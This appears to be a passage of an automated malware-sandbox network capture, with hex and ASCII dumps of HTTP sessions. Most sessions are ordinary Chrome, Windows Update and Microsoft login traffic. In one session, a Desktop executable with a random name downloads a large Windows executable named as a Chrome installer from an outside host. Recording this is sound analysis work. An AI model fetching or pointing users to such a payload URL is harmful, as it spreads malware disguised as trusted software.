                                                                                                                                            2024-10-31 16:12:14 UTC1378INData Raw: 39 32 31 36 7d 7d 7d 29 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 22 22 2c 64 3d 30 3b 64 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 4e 75 6d 62 65 72 28 61 72 67 75 6d 65 6e 74 73 5b 64 5d 29 3b 69 66 28 65 3c 30 7c 7c 65 3e 31 31 31 34 31 31 31 7c 7c 65 21 3d 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 5f 63 6f 64 65 5f 70 6f 69 6e 74 20 22 2b 65 29 3b 65 3c 3d 36 35 35 33 35 3f 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65
                                                                                                                                            Data Ascii: 9216}}});na("String.fromCodePoint",function(a){return a?a:function(b){for(var c="",d=0;d<arguments.length;d++){var e=Number(arguments[d]);if(e<0||e>1114111||e!==Math.floor(e))throw new RangeError("invalid_code_point "+e);e<=65535?c+=String.fromCharCode(e


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            4192.168.2.449750216.58.206.784437664C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:12:15 UTC726OUTPOST /log?format=json&hasfast=true HTTP/1.1
                                                                                                                                            Host: play.google.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Content-Length: 905
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                            Accept: */*
                                                                                                                                            Origin: chrome-untrusted://new-tab-page
                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            2024-10-31 16:12:15 UTC905OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 30 33 39 31 31 33 32 31 38 36 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c
                                                                                                                                            Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1730391132186",null,null,null,
                                                                                                                                            2024-10-31 16:12:16 UTC936INHTTP/1.1 200 OK
                                                                                                                                            Access-Control-Allow-Origin: chrome-untrusted://new-tab-page
                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                            Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                            Set-Cookie: NID=518=qSvVl3P-pDHNHpwsYaol_LPVxOUwMGkOV_YvHnht-AD9Se8ro7pIoeU1aMwv6dfIDIOyGPRko_o6JH2xV8vPaAlw5tFoY3ao6dTwpZiUW7ZvSaTnM53FhMOyvLJfBobU53Q2mOW8G9_ysWbRNKD22afLtJQqF2cSR5m_4jRMT9eOHWHzcw; expires=Fri, 02-May-2025 16:12:15 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:15 GMT
                                                                                                                                            Server: Playlog
                                                                                                                                            Cache-Control: private
                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                            Accept-Ranges: none
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Expires: Thu, 31 Oct 2024 16:12:15 GMT
                                                                                                                                            Connection: close
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            2024-10-31 16:12:16 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                            Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                            2024-10-31 16:12:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            5192.168.2.44975552.149.20.212443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:12:18 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=34N3nfbc+uLWcc3&MD=GLsAeukB HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                            2024-10-31 16:12:18 UTC560INHTTP/1.1 200 OK
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Expires: -1
                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                            MS-CorrelationId: 8b18d7a9-7f64-47c9-aaa0-ead7e4fa77e4
                                                                                                                                            MS-RequestId: 2542964c-e97a-429a-af4f-b7ca5b1e6d25
                                                                                                                                            MS-CV: DpYF//2p9EWp/ToY.0
                                                                                                                                            X-Microsoft-SLSClientCache: 2880
                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:18 GMT
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 24490
                                                                                                                                            2024-10-31 16:12:18 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                            2024-10-31 16:12:18 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            6192.168.2.44976187.106.236.484437308C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:12:31 UTC93OUTGET /adjunts/chrome_131.exe HTTP/1.1
                                                                                                                                            Host: osteo9.esalnuvol.com
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            2024-10-31 16:12:32 UTC272INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:31 GMT
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Content-Length: 8707480
                                                                                                                                            Last-Modified: Thu, 31 Oct 2024 10:58:11 GMT
                                                                                                                                            Connection: close
                                                                                                                                            ETag: "672362c3-84dd98"
                                                                                                                                            X-Powered-By: PleskLin
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:12:32 UTC16112INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0e 00 43 62 23 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 10 01 00 00 a2 6c 00 00 00 00 00 b0 e0 c5 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 f8 00 00 04 00 00 2d 0e 85 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00
                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdCb#g"l@`-`
                                                                                                                                            2024-10-31 16:12:32 UTC16384INData Raw: 7d 9f c8 5b 6d ce 2b 87 2c d7 18 97 1c d5 9b bd 98 84 fb 02 06 df 75 cd 83 61 3f 3e e8 cb 3a f4 4b 25 14 bf c2 9f 94 e6 4a fc 8a 1d b3 53 47 f3 25 97 44 ac 9c 9a 0d 41 48 30 da fd 60 c4 84 bd 2e 39 14 dd dc e5 42 79 9a f5 84 38 14 69 42 3e 0b 3a 18 25 1c 34 35 8a 25 c6 fb 9f 27 4c d2 99 1e a2 94 3e 2b 5b 3d 47 dc 8a a5 e2 b4 b1 7f 03 e3 3c 17 36 bf 96 84 ac 9b 61 d4 06 18 e0 6a cd 76 20 8e 3e 9a 02 85 05 18 e6 76 a4 cf 7f ea f0 83 00 1c 11 2e e9 4e d2 b7 df 35 f7 93 48 3c df e3 0d 95 bb ae 75 55 d1 23 4c 2f df 9c a5 35 03 d7 48 a6 d0 3a d9 ce 46 20 eb e0 c5 1d c2 f1 e8 8f 9a 9b da 75 d1 1f ff c0 5d 9d 27 63 b0 ff 45 cf f4 85 3b d0 3b 3b 91 75 28 4d ea e5 8b f0 cb 26 e7 65 d5 ad 6d 09 5e e7 23 7f 73 48 9b 2d 43 c2 59 8f f7 19 bd c6 b5 a5 a3 6c 6d 1d a0 df
                                                                                                                                            Data Ascii: }[m+,ua?>:K%JSG%DAH0`.9By8iB>:%45%'L>+[=G<6ajv >v.N5H<uU#L/5H:F u]'cE;;;u(M&em^#sH-CYlm
                                                                                                                                            2024-10-31 16:12:32 UTC16384INData Raw: f8 85 64 ee f3 89 ce 11 f7 86 05 ac f4 8f 59 a7 73 8c 4e e9 eb 03 b8 fe e1 0f b7 c3 ea 4a 53 93 ec 1c d6 60 89 ac 29 59 a5 df 21 1c 45 e1 29 4c 44 ea 4d 2a 52 ec b5 8d dc 9f 67 dd f4 65 64 df d4 76 9e 66 7f 99 44 db 92 02 32 bd 83 08 7f a8 9e 40 76 51 41 87 80 1b 3d f3 6b 76 a9 36 8f a2 9b 4f 77 94 a7 00 6d 90 a4 3f 09 68 b6 21 5d 75 a1 45 87 ab 49 43 3c b6 8c 9b 85 99 a2 4b 80 47 2f 98 58 72 f8 93 50 fa 9e 8f c9 ff 7c 1a ce ee 83 8d 57 25 6a fc 3d 7d 4e 0d 37 a8 5f 14 46 a2 70 e8 4d ea e2 d5 58 f7 2e c0 01 7a 4e d1 fa a7 23 d8 09 aa 34 6f f8 38 62 5f 9d 21 0a b5 c9 15 82 b9 e2 14 1e b9 e6 25 22 97 ab 8e 18 b4 7d 97 e6 1f 71 e7 d0 7a a7 70 e2 bf e8 ec e1 3e ac eb e8 da d9 e6 dc 0c de 68 85 21 eb 64 5e f9 23 2c 51 e8 2b 5d 6a ea 2c 93 56 87 0d 99 83 e4 5b
                                                                                                                                            Data Ascii: dYsNJS`)Y!E)LDM*RgedvfD2@vQA=kv6Owm?h!]uEIC<KG/XrP|W%j=}N7_FpMX.zN#4o8b_!%"}qzp>h!d^#,Q+]j,V[
                                                                                                                                            2024-10-31 16:12:32 UTC16384INData Raw: e2 28 6d aa d9 fc 57 a7 af 73 d7 bf b4 4d 5e 44 e7 3a 97 a1 a7 71 ad 56 ff 33 40 4d c1 91 57 44 55 d3 e8 25 9a 21 80 51 c0 63 88 9b 9a 73 b4 68 9e ad b3 15 66 19 aa 52 2a cd be 9e e8 42 82 19 8b 26 67 aa e8 39 a1 9b 08 4d 9f e1 e3 16 9c 57 16 cd b8 95 6c 1a 5c 00 fc e2 df 95 db 2c 87 a0 5c 92 b4 30 be 15 37 b6 d4 34 58 20 d7 06 6d db 1a 22 ef 15 b2 3d 9e be e3 9a d7 e9 45 26 a2 fc 9a 75 d7 94 ef 10 50 45 be 2c aa 15 d3 72 ca 40 dc a6 82 e4 1a 34 a1 dd cd 16 84 ab e5 4d 50 6a 8c 31 4a 9f 5d 32 57 b5 e6 3c 21 41 92 4d c2 75 1a 2e b2 be fd 14 53 16 c9 dc d0 b4 8f 41 57 72 f7 3c b8 5c 9a 29 49 bb df 70 b9 de 9a 26 47 c5 18 2a 52 e2 cf 0b 8b 5b 1a 7d a5 54 c9 15 a2 f1 d3 28 ca b5 9a 3c 41 a2 18 2e a7 9f a0 31 07 95 e2 11 a9 54 e1 6d 75 6f d1 1a 59 84 44 4d 85
                                                                                                                                            Data Ascii: (mWsM^D:qV3@MWDU%!QcshfR*B&g9MWl\,\074X m"=E&uPE,r@4MPj1J]2W<!AMu.SAWr<\)Ip&G*R[}T(<A.1TmuoYDM
                                                                                                                                            2024-10-31 16:12:32 UTC16384INData Raw: fa 21 5b 67 ae 0a 05 9a dd 08 8b 57 f5 4c 80 76 ca ef ab 95 d7 3d b3 9d d3 67 46 64 ae 32 2e 41 f0 f8 bf c3 6a cc 54 ae b0 75 5e b4 c9 17 94 10 f3 09 ba 72 65 62 5f 52 ec 06 af ec e2 b3 19 9b e5 69 96 48 da db ac 50 6a 3d cf 86 b2 75 51 9f e8 3a 80 bb 3a 7d a5 4f fa 92 d1 db c1 8d aa 57 ee 25 a9 63 a9 5d 87 5d 18 15 5d b0 d6 31 a8 54 a4 72 d7 ab ea 18 b1 77 f3 11 8f a0 85 0b 87 1c a8 2f b9 19 c9 32 d7 b2 e0 1d 95 98 d8 2d a0 58 f8 b3 1a 94 db f8 4d e5 b7 e5 b9 a0 97 2a 5c 6c e0 71 40 5e 0a 35 b6 a1 f5 c6 a7 4c cf 75 bd 0a 18 3c 5d be a6 27 97 84 c1 2e 54 56 4b af 54 e3 f9 ec 4e 9a 26 36 4b 04 f8 ed 82 c5 e2 d9 bf 94 fb 28 48 a9 b1 10 bc 8c de 4f 27 32 f2 a5 9d 35 c3 62 84 94 c0 06 b2 bb dd 20 b8 fe 9a 35 87 bc 0b e8 9e 85 fb 1d 54 43 4b c2 a7 0e df d8 e7
                                                                                                                                            Data Ascii: ![gWLv=gFd2.AjTu^reb_RiHPj=uQ::}OW%c]]]1Trw/2-XM*\lq@^5Lu<]'.TVKTN&6K(HO'25b 5TCK
                                                                                                                                            2024-10-31 16:12:32 UTC16384INData Raw: a0 79 8b a7 a5 cc ad b0 e0 3a 52 b7 22 73 94 41 c0 39 ba 94 dc 6b 9b b3 d7 49 57 b8 f4 7b b4 4f e9 02 db 95 c1 b9 a8 bd c8 0c b3 15 ae 2c f5 a1 66 12 48 b7 ca 09 a4 ae 62 3c ad 57 a1 1b cd bd ec 76 d7 be e9 35 13 62 98 ed b6 d5 9a 62 4d b9 bd 0c eb 75 50 f5 a3 16 b1 39 44 16 da c7 5e a4 dc ec 57 73 1f 3a 0f 99 ed cd bf 6a aa 20 b5 b3 e2 73 d7 4c d5 4f 4b a7 ff 3d 5e 73 09 29 57 4d 1d d2 50 b5 71 31 d9 68 b4 cd b0 15 18 cd a9 5b cd cc 49 a7 e7 90 d7 ef b2 15 97 9b 19 10 8e be e5 3b 97 15 e6 1c b7 b5 fe 15 4d b9 4d 34 91 65 f0 21 d2 95 a8 95 54 5d 1a 05 a9 0f dc 08 a0 95 e9 29 b6 71 e1 0a 59 d2 1a 77 92 b9 f7 b1 57 14 22 13 e9 95 c5 23 4d 90 fa 34 a1 4a 02 cd 9d 56 3b 38 f9 f4 13 c3 1f 95 c0 68 84 a6 41 2c f7 44 ff c7 77 65 a6 11 30 15 d8 8b d7 98 d6 26 50
                                                                                                                                            Data Ascii: y:R"sA9kIW{O,fHb<Wv5bbMuP9D^Ws:j sLOK=^s)WMPq1h[I;MM4e!T])qYwW"#M4JV;8hA,Dwe0&P
                                                                                                                                            2024-10-31 16:12:32 UTC16384INData Raw: a2 39 a9 d4 1a 33 a0 45 4a 2f 73 9e bb 2d 9b 70 e6 33 e7 15 cb 23 95 9d d2 3f aa 9f 04 65 48 4e 7a 3b 92 41 70 cd 50 57 ef 09 a5 66 5c 34 13 54 3c d8 af 19 c3 1e 8f 99 25 6d 90 9b d0 4c a3 a6 bb 28 a7 60 bd 88 f0 82 56 8f 58 4e ef b3 01 51 f0 6e b8 15 ef 48 83 07 58 cd 5d 55 9a 3e e7 15 a6 d9 a3 61 cf a0 56 b1 db 26 5b a0 f8 0f 83 2d c2 cd 5d 65 bf 02 a6 ba e2 75 48 d0 ed 61 8b 76 9e 37 5e b1 c4 8f bc a7 d3 2c d7 b7 e2 06 b8 54 9a 36 b1 b5 dc 4a db 15 be 05 87 48 31 32 d7 5f fc 0d 36 53 f6 5f 56 16 a8 1e b7 ad cd 21 d7 3c a2 4d 5e 42 a0 1a d2 53 e0 b1 54 96 f5 4d 3e 15 ed 16 a8 50 69 d9 d7 d9 e8 2e c1 95 f5 36 52 9d 19 ae 58 69 50 24 f7 e1 d0 34 ae 51 bd 6d 97 ae c7 02 4b 95 ef 06 5c 50 f2 7c 53 b5 1e 1e 64 54 3a 66 b2 bb fc 0e 11 8f f2 46 79 29 e3 f4 45
                                                                                                                                            Data Ascii: 93EJ/s-p3#?eHNz;ApPWf\4T<%mL(`VXNQnHX]U>aV&[-]euHav7^,T6JH12_6S_V!<M^BSTM>Pi.6RXiP$4QmK\P|SdT:fFy)E
                                                                                                                                            2024-10-31 16:12:32 UTC16384INData Raw: bd 6b 6b 95 65 30 48 70 ba 06 9c 71 a7 36 2a fd 1a 2f 81 61 a6 fb 56 b4 f5 7c 4e 56 af e3 d6 85 cd 38 80 75 f3 00 b2 b8 bf ce f3 f5 c6 33 5d 89 dd 54 5d d6 68 32 46 2f 95 1b 77 15 69 3b 6b 15 9e 0a a4 55 08 3e a8 53 d5 2b 0c 8d 1a 0e d7 a7 11 d7 0c 1c 9a 7d d7 50 b5 1e d1 6a e2 02 52 40 3d 4c 57 a5 d8 3e e9 f5 45 1a 34 fb 1a 47 1d 15 18 13 88 a5 ce 0f f5 10 48 cd f7 d5 c0 e2 38 a3 29 72 77 4d c7 7e 5e 6b e3 73 bf 1c 49 32 11 9b f2 e9 c1 95 fc fc 57 b2 ee 3b f5 68 39 29 58 79 fa cd b5 a3 d3 34 e8 5a b1 73 7f 80 a1 9d d7 9d 07 cd 4d 4f a2 7a b4 cd d6 3f b6 bb dc cd 49 9f c6 09 81 dc 2c 20 90 15 22 2f b6 aa e5 3c 53 53 b7 19 83 47 3a dc a3 46 ec 1e b7 95 ff 35 83 57 59 31 af 47 d5 8d a9 a7 ee 3b a4 a8 d4 3a d7 b9 78 2d 3c 2d 8a ae 71 95 95 b3 8d ad e4 73 48
                                                                                                                                            Data Ascii: kke0Hpq6*/aV|NV8u3]T]h2F/wi;kU>S+}PjR@=LW>E4GH8)rwM~^ksI2W;h9)Xy4ZsMOz?I, "/<SSG:F5WY1G;:x-<-qsH
                                                                                                                                            2024-10-31 16:12:33 UTC16384INData Raw: ea 21 9b 58 f8 e3 d5 ce 3e cd 33 69 9a 22 4c 16 9a 19 81 ba 5f 3d d7 b1 fa 18 5d 54 12 cd ed be 0b 6c 8b 10 1a 7f 79 5c 1a 77 f6 55 cd 2d e9 9e 4a c9 4c 50 e0 05 9e 95 fe b6 7d ae 59 61 4d 5c 9a dd d7 6c 00 0a 99 56 5c 35 57 66 e3 26 42 6f 0e cd 61 b2 ea 37 9d 61 ce 39 46 65 a7 4f b2 b1 f7 19 53 cd 68 66 9b ab 6a 3a d7 94 3b cd 5f e9 c3 5d 98 ae 38 31 7d b9 1b 67 87 6a d7 2e 49 a3 dc 88 57 b6 e9 29 b1 9f ae ce a5 4f a5 27 46 b2 1a 7c ba a2 24 23 ef 63 ae 3d 0e ab e9 2e 4d 8f e9 04 44 16 c1 6d 5a 77 cb 30 ac 17 f5 39 ba a3 b5 23 4b 52 6a c5 31 63 da 93 a2 bd 1a 76 a0 9d d1 31 95 6a 19 12 f4 9c 44 19 f7 57 15 42 5b 6e bf 17 4c a3 c7 c9 15 4b b7 bb 80 7b d7 53 15 76 93 4d aa 58 81 2f 57 95 e5 3e b0 ab de 1b 16 95 dd 15 92 2b 10 cd 54 6e a2 3e 4a b6 7f 71 d7
                                                                                                                                            Data Ascii: !X>3i"L_=]Tly\wU-JLP}YaM\lV\5Wf&Boa7a9FeOShfj:;_]81}gj.IW)O'F|$#c=.MDmZw09#KRj1cv1jDWB[nLK{SvMX/W>+Tn>Jq
                                                                                                                                            2024-10-31 16:12:33 UTC16384INData Raw: c2 2d 56 8d 9b 9a 4e fd fd a1 8b a4 7d 42 36 3c f0 45 57 a6 e4 15 ec b0 c6 3d 50 78 c3 33 f4 51 d6 12 d4 55 9a 3b 52 45 b0 1a 3f 9c ec 4e 6e 15 a1 31 d7 69 d8 cc aa 99 e1 11 a5 c4 9a d0 45 4e 1a 4f 9f 51 1a b3 5b 6b e8 db f4 90 68 cd d5 7c 9a 1d d5 a7 9a 39 81 85 1a 6b 73 ba 1a 25 b6 99 cb 68 a5 bd b4 11 41 aa 9a bc b4 1e c0 6b 94 95 d7 62 a4 ab e2 a8 8b 95 92 08 9c c8 21 cd c4 4e c6 04 ef 44 e7 2d a4 51 a2 1b 10 1e f3 43 15 ce 19 3e 40 68 14 9b 27 3d b2 76 9a 76 4e 0a 5c b3 c7 69 94 66 e6 61 82 d8 b7 8b 11 c3 db 53 16 99 3a 08 10 4c c7 93 b4 75 ba 0d f5 cd dc ad fd 4b 19 af 96 95 c1 09 d7 11 0c 69 98 9f 51 2d 57 a3 e2 09 54 06 e7 cd 5b b7 50 3e 57 bd 69 8b 56 96 d3 32 b1 40 d0 c3 57 1d fa b3 bc a8 dc 46 9d 95 6a cd cd ef 9a 81 dd 83 4a 4d ab 14 e6 5d 57
                                                                                                                                            Data Ascii: -VN}B6<EW=Px3QU;RE?Nn1iENOQ[kh|9ks%hAkb!ND-QC>@h'=vvN\ifaS:LuKiQ-WT[P>WiV2@WFjJM]W


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            7192.168.2.44976340.126.32.133443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:12:46 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/soap+xml
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                            Content-Length: 3592
                                                                                                                                            Host: login.live.com
